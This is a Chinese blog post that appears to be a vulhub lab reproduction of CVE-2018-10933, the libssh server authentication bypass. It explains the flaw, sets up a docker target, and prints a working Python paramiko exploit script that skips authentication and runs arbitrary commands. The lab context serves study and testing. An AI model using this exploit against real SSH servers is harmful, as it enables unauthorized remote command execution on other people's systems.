栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

vulhub漏洞复现36

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

vulhub漏洞复现36

CVE-2018-10933_ libssh 服务端权限认证绕过漏洞

漏洞详情

libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送`MSG_USERAUTH_SUCCESS`消息,绕过认证过程,未授权访问目标SSH服务器。

漏洞环境

靶场:192.168.4.10_ubuntu

#docker-compose up -d

环境启动后,我们可以连接`your-ip:2222`端口(账号密码:`myuser:mypassword`),这是一个合法的ssh流程:

#ssh myuser@192.168.4.10 -p 2222

漏洞复现

参考 https://www.seebug.org/vuldb/ssvid-97614 中给出的POC,我们编写一个简单的漏洞复现脚本:

```python

#!/usr/bin/env python3

import sys

import paramiko

import socket

import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)

bufsize = 2048

def execute(hostname, port, command):

    sock = socket.socket()

    try:

        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()

        transport = paramiko.transport.Transport(sock)

        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

        transport._send_message(message)

        client = transport.open_session(timeout=10)

        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)

        stdout = client.makefile("rb", bufsize)

        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()

        error = stderr.read()

        stdout.close()

        stderr.close()

        return (output+error).decode()

    except paramiko.SSHException as e:

        logging.exception(e)

        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")

    except socket.error:

        logging.debug("Unable to connect.")

    return None

if __name__ == '__main__':

    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

```

使用python3执行,即可在目标服务器上执行任意命令:

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/733277.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号